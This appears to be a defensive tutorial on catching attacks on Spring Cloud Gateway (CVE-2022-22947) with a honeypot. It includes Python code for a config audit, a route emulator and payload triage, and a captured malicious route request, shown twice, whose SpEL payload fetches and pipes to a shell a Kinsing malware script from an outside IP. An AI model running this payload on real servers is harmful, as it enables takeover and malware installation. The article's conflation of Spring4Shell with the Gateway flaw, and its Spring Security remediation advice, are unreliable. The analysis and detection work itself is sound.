How Hackers Exploit Spring Core Vulnerability in 2025: Proactive Measures to Detect Emerging Cyber Threats
This tutorial explains how to develop an effective low-interaction honeypot that emulates Spring Cloud Gateway applications in order to trap attackers.
API management has emerged as a critical and strategic factor in staying ahead of market leaders. However, digital transformation has significant disadvantages, such as opening the door to hackers.
Hackers have been quick to take advantage of a serious flaw in Spring Core, commonly known among security experts as SpringShell or Spring4Shell. The attacker sends a specially crafted request to a web application server running the Spring Core framework.
Thankfully, combining reactive (defensive) and proactive (threat hunting) approaches can mitigate the evolving cyber threat landscape.
Remote Code Execution Vulnerability Targeting Spring Cloud Gateway
In early 2022, a critical vulnerability (CVSS score: 10.0) was discovered in Spring Cloud Gateway. When the Gateway Actuator endpoint is enabled, exposed, and not properly secured, it opens the door to remote code injection. Attackers can exploit this flaw using the Actuator API to perform SpEL (Spring Expression Language) injection, potentially leading to full system compromise. Versions prior to 3.1.1 and 3.0.7 are affected (NVD - Cve-2022-22947, n.d.).
In this way, a threat actor could exploit the vulnerability by sending a maliciously crafted request, allowing arbitrary code to be executed remotely on the target host.
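The precondition just described, the gateway actuator endpoint being enabled, exposed over HTTP and not secured, is visible in an application's configuration long before any request arrives. The following check is an added example written for this article, not Spring's tooling and not part of the original text. The property keys are the documented Spring Boot and Spring Cloud Gateway ones; the two sample property files are constructed, and the defaults it assumes (gateway endpoint enabled, web exposure limited to `health`) are stated in the comments.

```python
"""Audit Spring Cloud Gateway configuration for an exposed /actuator/gateway endpoint.

Added example for this article; not Spring's code. Sample property files are
constructed. Assumed defaults: the gateway endpoint is enabled unless turned off
(as the Spring Cloud Gateway reference states) and Spring Boot exposes only
`health` over the web unless told otherwise.
"""

# Constructed: an exposed configuration of the kind the article describes.
WEAK_PROPERTIES = """\
server.port=8080
management.endpoint.gateway.enabled=true
management.endpoints.web.exposure.include=*
"""

# Constructed: the same application with the actuator surface closed.
HARDENED_PROPERTIES = """\
server.port=8080
management.endpoint.gateway.enabled=false
management.endpoints.web.exposure.include=health
management.server.port=9090
management.server.address=127.0.0.1
"""

LOOPBACK = ("127.0.0.1", "::1", "localhost")


def parse_properties(text):
    """Minimal .properties reader: key=value per line, '#'/'!' comments, no escapes."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = value.strip()
    return props


def _csv(value):
    """Split a comma-separated property value into a lower-cased set."""
    return {item.strip().lower() for item in value.split(",") if item.strip()}


def gateway_endpoint_exposed(props):
    """True when /actuator/gateway would answer over HTTP with this configuration."""
    enabled = props.get("management.endpoint.gateway.enabled", "true").lower() == "true"
    include = _csv(props.get("management.endpoints.web.exposure.include", "health"))
    exclude = _csv(props.get("management.endpoints.web.exposure.exclude", ""))
    included = "gateway" in include or "*" in include
    excluded = "gateway" in exclude or "*" in exclude
    return enabled and included and not excluded


def audit_actuator(props):
    """Return a list of findings; an empty list means the precondition is absent."""
    findings = []
    if not gateway_endpoint_exposed(props):
        return findings
    findings.append(
        "HIGH: /actuator/gateway is enabled and exposed over HTTP; set "
        "management.endpoint.gateway.enabled=false or remove it from "
        "management.endpoints.web.exposure.include")
    # management.server.address only takes effect when the management port
    # differs from the application port, so both must be checked together.
    mgmt_port = props.get("management.server.port")
    on_loopback = (mgmt_port is not None
                   and mgmt_port != props.get("server.port", "8080")
                   and props.get("management.server.address", "") in LOOPBACK)
    if not on_loopback:
        findings.append(
            "MEDIUM: management endpoints share the application's listener; move them "
            "to a separate management.server.port bound to "
            "management.server.address=127.0.0.1, or require authentication for them")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_PROPERTIES), ("hardened", HARDENED_PROPERTIES)):
        print(label, audit_actuator(parse_properties(text)) or ["no findings"])
```

Run against a real `application.properties` this flags only the combination that matters: an enabled gateway endpoint that is actually included in the web exposure list and not excluded again; exclusion, disabling, or a loopback-bound management port each clear the corresponding finding.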
Honeypot – Active Threat Hunting
A honeypot is a system with intentional misconfigurations and vulnerabilities, deployed to gather the tactics and methodology threat actors use against digitally connected assets and target applications. Such a decoy makes attackers believe it is a real target while they are, unknowingly, being trapped and monitored.
Think of it this way: you leave the door of your house open and find out who knocks, who enters, and how they behave once inside.
The primary purpose of a honeypot is to attract and interact with malicious actors, such as hackers and cybercriminals, to gather valuable information about their tactics, techniques, and tools. The collected data, with its contextual information, can be used for threat intelligence, research, and improving overall cybersecurity defenses. The honeypot must be suited to observing manual attacks while remaining as inconspicuous as possible, so that attackers do not detect it.
What Value Does a Honeypot Add to an Organization's Network Security?
The following are a few key reasons for adding honeypots in the pipeline of an organization's cyber defense systems:
- Early detection of attacks: Pre-empt the cyber attacks before they reach the tangible assets.
- Threat Intelligence: Accurate threat intelligence to gain insights into new attacks, exploits, malware, tools, and techniques.
- Signature generation: Generate detection signatures (an antidote) for newly discovered attacks.
- Distraction: Trap hackers by redirecting them from actual assets.
- Security verification: Verify how secure the organization's environment is.
Honeypot Types
Before deploying a honeypot, it’s crucial to understand the various types and their strategic roles in threat detection.
Types of attacked resources:
- Client honeypot: Captures attacks that exploit client-side vulnerabilities; also called an active honeypot.
- Server honeypot: Captures attacks that exploit server-side vulnerabilities; also called a passive honeypot.
Level of interaction:
- Low interaction: Provides an emulated environment to the hacker, with no tangible assets. Usually simple to set up.
- High interaction: Provides a real environment and real assets for more extended engagement with the hacker. Usually costly to set up and maintain.
Kinds of deployments:
- Production honeypot: Deceives hackers inside a production network and protects tangible assets.
- Research honeypot: Gives a deeper understanding of hackers' tactics. Usually, hackers are allowed to break into full-blown, tangible assets.
Implementation: Gathering PoC Exploits and Malware
Figure 1 shows the emulation environment of a low-interaction honeypot that engages the threat actor and gathers exploits and malware targeting Spring Cloud Gateway applications.
Figure 1: Basic Workflow of Honeypot Emulation
Network Traffic Analysis
The attacker sends a POST request with a JSON body to create a new route in Spring Cloud Gateway; the JSON configuration sets the response header of that route.
Step 1: Figure 2 illustrates the POST request and response extracted from PCAP dump files using deep packet inspection.

Figure 2: “Post” request and response communication
Step 2: The attacker triggers a configuration reload via the Spring Cloud Gateway /actuator/gateway/refresh endpoint, which applies the malicious route configuration if the endpoint is not properly secured (refer to Figure 3).

Figure 3: The Config_file
Step 3: Figure 4 shows the attacker fetching the created route, whose response carries the output of the SpEL-injected command and so confirms code execution (e.g., uid=0(root)).

Figure 4: Command Execution via SpEL injection
Step 4: Figure 5 shows the deletion of the created route to avoid detection.

Figure 5: Hiding Trace to Avoid Detection
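The four-step sequence above (create route, refresh, read the route back, delete it) is exactly what a low-interaction honeypot has to answer convincingly without ever evaluating the posted SpEL. The following emulator is an added example written for this article; it is not the author's honeypot and not Spring's code. The paths and status codes follow the gateway actuator API as described in the steps, the `FAKE_RESULT` string is a constructed canned reply, and nothing posted to it is ever executed: every request is appended to an evidence log that the attacker's DELETE in Step 4 cannot erase.

```python
"""Low-interaction emulation of the Spring Cloud Gateway actuator routes API.

Added example for this article, not Spring's code and not the honeypot the
author built. Nothing posted here is evaluated or executed: the emulator stores
the route JSON, answers each of the four steps with the status a real gateway
would give, and keeps an append-only event log that a DELETE cannot erase.
"""
import json
import re
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

ROUTE_RE = re.compile(r"^/actuator/gateway/routes/(?P<route_id>[A-Za-z0-9_.-]+)$")
REFRESH_PATH = "/actuator/gateway/refresh"
# Canned text returned in place of the filter value on read-back (Step 3),
# constructed to resemble the output the article shows. Nothing is run to
# produce it.
FAKE_RESULT = "uid=0(root) gid=0(root) groups=0(root)\n"


class GatewayHoneypot:
    def __init__(self):
        self.routes = {}   # route_id -> definition exactly as posted
        self.events = []   # append-only evidence, one record per request

    def _log(self, peer, method, path, body, note):
        self.events.append({"ts": time.time(), "peer": peer, "method": method,
                            "path": path, "body": body, "note": note})

    def handle(self, method, path, body, peer="unknown"):
        """Emulate one request; return (status, response_body) and log it."""
        if path == REFRESH_PATH and method == "POST":
            self._log(peer, method, path, body, "step2: refresh requested")
            return 200, ""
        m = ROUTE_RE.match(path)
        if not m:
            self._log(peer, method, path, body, "unknown actuator path")
            return 404, json.dumps({"status": 404, "error": "Not Found"})
        rid = m.group("route_id")
        if method == "POST":
            try:
                route = json.loads(body or "")
            except ValueError:
                self._log(peer, method, path, body, "malformed route JSON")
                return 400, ""
            self.routes[rid] = route
            self._log(peer, method, path, body, "step1: route created")
            return 201, ""
        if method == "GET":
            route = self.routes.get(rid)
            if route is None:
                self._log(peer, method, path, body, "read of unknown route")
                return 404, ""
            shown = json.loads(json.dumps(route))   # copy; the original stays as evidence
            filters = shown.get("filters", []) if isinstance(shown, dict) else []
            for flt in filters:
                args = flt.get("args") if isinstance(flt, dict) else None
                if isinstance(args, dict) and "value" in args:
                    args["value"] = FAKE_RESULT     # pretend the filter "worked"
            self._log(peer, method, path, body, "step3: route read back")
            return 200, json.dumps(shown)
        if method == "DELETE":
            existed = self.routes.pop(rid, None) is not None
            self._log(peer, method, path, body, "step4: route deleted")
            return (200, "") if existed else (404, "")
        self._log(peer, method, path, body, "unsupported method")
        return 405, ""


def serve(honeypot, host="0.0.0.0", port=8080):
    """Expose the emulator over HTTP; blocks until interrupted."""
    class Handler(BaseHTTPRequestHandler):
        def _dispatch(self):
            length = int(self.headers.get("Content-Length") or 0)
            body = self.rfile.read(length).decode("utf-8", "replace")
            status, resp = honeypot.handle(self.command, self.path, body,
                                           self.client_address[0])
            self.send_response(status)
            self.send_header("Content-Type", "application/json")
            self.end_headers()
            self.wfile.write(resp.encode("utf-8"))

        do_GET = do_POST = do_DELETE = _dispatch

        def log_message(self, *args):   # keep stdout quiet; events hold the record
            pass

    ThreadingHTTPServer((host, port), Handler).serve_forever()


if __name__ == "__main__":
    hp = GatewayHoneypot()
    try:
        serve(hp)
    finally:
        for event in hp.events:       # dump the evidence log on shutdown
            print(json.dumps(event))
```

The read-back in Step 3 is the only place the emulator lies: it substitutes the canned string for whatever was posted as the filter value, so an intruder sees what looks like a successful command while the actual payload sits untouched in `events`, ready for the analysis described in the next section.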
Decoded Base64 Shell Code
Once the Base64 script is decoded, it reveals a URL pointing to an embedded script, as shown in Figure 6. When that script is downloaded manually, in a controlled and isolated environment, using the wget command on a Linux machine, it turns out to be the malware known as "KINSING MALWARE".
POST /actuator/gateway/routes/BuOHOGeywH HTTP/1.1
Host: 180.188.253.170:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Content-Length: 411
Content-Type: application/json
Accept-Encoding: gzip
{
  "id": "BuOHOGeywH",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 94.103.87.71/scg.sh||wget -q -O- 94.103.87.71/scg.sh)|sh\"}).getInputStream()))}"}
  }],
  "uri": "http://example.com",
  "order": 0
}

Figure 6: Detected Kinsing Malware Family
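A honeypot that stores route definitions as posted still needs a way to tell a routine `AddResponseHeader` filter from one carrying a SpEL payload, and to pull the download location out of it for threat intelligence. The triage below is an added example written for this article, not the author's tooling or Spring's code. The request body it analyses is the one captured above, reproduced verbatim as a Python string; the indicator patterns and the three verdict tiers are this example's own choices.

```python
"""Signature-based triage of a captured Spring Cloud Gateway route definition.

Added example for this article, not Spring's or the honeypot's own code. The
route JSON below is the request body captured in the article; the patterns and
the verdict tiers are this example's choice. Nothing here evaluates SpEL.
"""
import json
import re

# Request body captured in the article (Figure 6), reproduced verbatim.
CAPTURED_BODY = r'''{
"id": "BuOHOGeywH",
"filters": [{
"name": "AddResponseHeader",
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"/bin/sh\",\"-c\",\"(curl -s 94.103.87.71/scg.sh||wget -q -O- 94.103.87.71/scg.sh)|sh\"}).getInputStream()))}"}
}],
"uri": "http://example.com",
"order": 0
}'''

# A SpEL template expression inside a filter argument: #{ ... }
SPEL_RE = re.compile(r"#\{.*\}", re.S)
# Constructs inside the expression that mean "run code", not "set a header".
INDICATORS = {
    "runtime-exec": re.compile(r"T\(\s*java\.lang\.Runtime\s*\)|\.exec\s*\("),
    "process-builder": re.compile(r"java\.lang\.ProcessBuilder"),
    "reflection": re.compile(r"\.getClass\(\)|Class\.forName|T\(\s*java\.lang\.Class\s*\)"),
    "shell-pipe": re.compile(r"/bin/(?:ba)?sh|\|\s*(?:ba)?sh\b"),
    "downloader": re.compile(r"\b(?:curl|wget)\b"),
}
# IPv4 host with optional port and path, e.g. 94.103.87.71/scg.sh
IP_URL_RE = re.compile(r"(?:https?://)?(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?:/[\w./-]*)?")


def _strings(node):
    """Yield every string value in a parsed JSON document, at any depth."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from _strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from _strings(value)


def analyse_route(body):
    """Return a triage record for one POST /actuator/gateway/routes/{id} body."""
    try:
        route = json.loads(body)
    except ValueError:
        return {"verdict": "malformed", "route_id": None, "expressions": [],
                "indicators": [], "iocs": []}
    expressions = [m.group(0) for s in _strings(route) for m in SPEL_RE.finditer(s)]
    hits, iocs = [], []
    for expr in expressions:
        for name, pattern in INDICATORS.items():
            if pattern.search(expr) and name not in hits:
                hits.append(name)
        for url in IP_URL_RE.findall(expr):   # IoCs only from inside the SpEL
            if url not in iocs:
                iocs.append(url)
    if hits:
        verdict = "malicious"
    elif expressions:
        verdict = "suspicious"   # SpEL present, but no code-execution construct
    else:
        verdict = "benign"
    route_id = route.get("id") if isinstance(route, dict) else None
    return {"verdict": verdict, "route_id": route_id, "expressions": expressions,
            "indicators": hits, "iocs": iocs}


if __name__ == "__main__":
    print(json.dumps(analyse_route(CAPTURED_BODY), indent=2))
```

IoC extraction is deliberately limited to text inside the `#{ ... }` expression, so a legitimate `uri` such as `http://example.com` in the same route is not reported as an indicator; on the captured body the record comes back as malicious, with `94.103.87.71/scg.sh` as the single download location to feed into blocklists or the VirusTotal lookup described next.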
The "KINSING MALWARE" sample is analyzed using the VirusTotal API, as shown in Figure 7, and 39 of the 66 AV scanners flag it, giving a threat score of 39/66.

Figure 7: Virustotal Analysis of Collected Malware Sample
Remediation and Recommendations
- Enhance protection with a next-generation firewall and configure its rule sets against SpringShell vulnerabilities and exploits.
- Deploy a regional or commercial Azure Application Gateway and enable the WAF rules specifically designed to defend against SpringShell exploits.
- The strongest defense is upgrading to the latest patched version of Spring Security. Developers should also ensure consistent response times regardless of whether login credentials are valid, to avoid leaking clues to attackers.
- Install the latest anti-virus scanners and periodically update their signature databases.
- Practice active threat hunting instead of depending entirely on a reactive security approach.
- Educate users and staff about cyber hygiene practices.
References
1. NVD - CVE-2022-22947. (n.d.). https://nvd.nist.gov/vuln/detail/cve-2022-22947